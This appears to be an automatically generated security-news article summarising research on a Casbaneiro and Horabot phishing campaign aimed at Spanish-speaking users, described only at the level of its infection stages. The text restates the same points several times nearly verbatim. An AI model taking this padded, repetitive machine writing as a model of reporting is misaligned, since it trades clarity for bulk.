Ethical Hacking News
A sophisticated phishing campaign targeting Spanish-speaking users in organizations across Latin America and Europe has been linked to a Windows banking Trojan called Casbaneiro, according to recent research by BlueVoyant. The e-crime group attributed to the campaign, Augmented Marauder and Water Saci, employs a range of attack mechanisms including WhatsApp automation, ClickFix social engineering, and email-centric phishing to deceive recipients into opening password-protected PDF attachments.
Casbaneiro, a sophisticated Windows banking Trojan, is at the center of a phishing campaign targeting Spanish-speaking users. The campaign has been attributed to an e-crime group tracked as Augmented Marauder and Water Saci. The group employs various attack mechanisms, including WhatsApp automation, ClickFix social engineering, and email-centric phishing. The phishing emails use court summons-themed messages to deceive recipients into opening password-protected PDF attachments. The campaign leads to the execution of interim HTML Application (HTA) and VBS payloads that carry out environment and anti-analysis checks. Casbaneiro's VBS script retrieves next-stage payloads from a remote server, which lead to the launch of Casbaneiro and Horabot malware families. The e-crime group uses dynamic PDF generation and WhatsApp automation to bypass modern security controls. Water Saci has a history of using WhatsApp Web as a distribution vector for banking trojans, but recent campaigns use ClickFix social engineering tactic.
Casbaneiro, a sophisticated Windows banking Trojan, has been found at the center of a multifaceted phishing campaign targeting Spanish-speaking users in organizations across Latin America and Europe. The activity has been attributed to an e-crime group tracked as Augmented Marauder and Water Saci, which was first documented by Trend Micro in October 2025.
According to security researchers Thomas Elkins and Joshua Green of BlueVoyant, the threat group employs a range of attack mechanisms, including WhatsApp automation, ClickFix social engineering, and email-centric phishing. The campaign begins with phishing emails that employ court summons-themed messages to deceive recipients into opening password-protected PDF attachments. These attachments contain malicious links and initiate automatic downloads of ZIP archives, which in turn lead to the execution of interim HTML Application (HTA) and VBS payloads.
The VBS script designed by Casbaneiro carries out environment and anti-analysis checks similar to those found in Horabot artifacts, including checks for Avast antivirus software. The script proceeds to retrieve next-stage payloads from a remote server, among which are AutoIt-based loaders that extract and run encrypted payload files with ".ia" or ".at" extensions. These payloads lead to the launch of Casbaneiro ("staticdata.dll") and Horabot ("at.dll"), two malware families used as propagation mechanisms.
Casbaneiro's Delphi DLL module contacts a command-and-control (C2) server to fetch a PowerShell script that employs Horabot to distribute the malware via phishing emails to harvested contacts from Microsoft Outlook. In contrast, Horabot is used as a secondary payload targeting Yahoo, Live, and Gmail accounts to send phishing emails via Outlook.
The e-crime group's use of dynamic PDF generation and WhatsApp automation demonstrates an agile adversary continually innovating and executing diverse attack paths to bypass modern security controls. The integration of these tactics highlights the threat group's ability to maintain a bifurcated, multi-pronged attack infrastructure dynamically deploying WhatsApp-centric Maverick chains and concurrently utilizing both ClickFix and email-based Horabot attack paths.
Furthermore, Water Saci has a history of using WhatsApp Web as a distribution vector for disseminating banking trojans like Maverick and Casbaneiro in a worm-like manner. However, recent campaigns have leveraged the ClickFix social engineering tactic to dupe users into running malicious HTA files with the end goal of deploying Casbaneiro and the Horabot spreader.
The researchers concluded that this adversary is maintaining a multifaceted attack infrastructure that dynamically deploys WhatsApp-centric Maverick chains and concurrently utilizes both ClickFix and email-based Horabot attack paths. This integration demonstrates the group's agility in continually innovating and executing diverse attack paths to bypass modern security controls.
Related Information:
https://www.ethicalhackingnews.com/articles/A-Multifaceted-Phishing-Campaign-Casbaneiro-Targets-Latin-America-and-Europe-ehn.shtml
https://thehackernews.com/2026/04/casbaneiro-phishing-targets-latin.html
https://www.bluevoyant.com/blog/augmented-marauders-multi-pronged-casbaneiro-campaigns
https://www.fortinet.com/blog/threat-research/horabot-unleashed-a-stealthy-phishing-threat
https://gurucul.com/latest-threats/horabot-unleashed-a-stealthy-phishing-threat/
https://www.sygnia.co/blog/breaking-down-casbaneiro-infection-chain-part2/
https://www.pcrisk.com/removal-guides/16026-casbaneiro-trojan
https://www.socinvestigation.com/comprehensive-list-of-apt-threat-groups-motives-and-attack-methods/
https://cloud.google.com/security/resources/insights/apt-groups
https://securelist.com/horabot-campaign/119033/
Published: Wed Apr 1 09:17:32 2026 by llama3.2 3B Q4_K_M
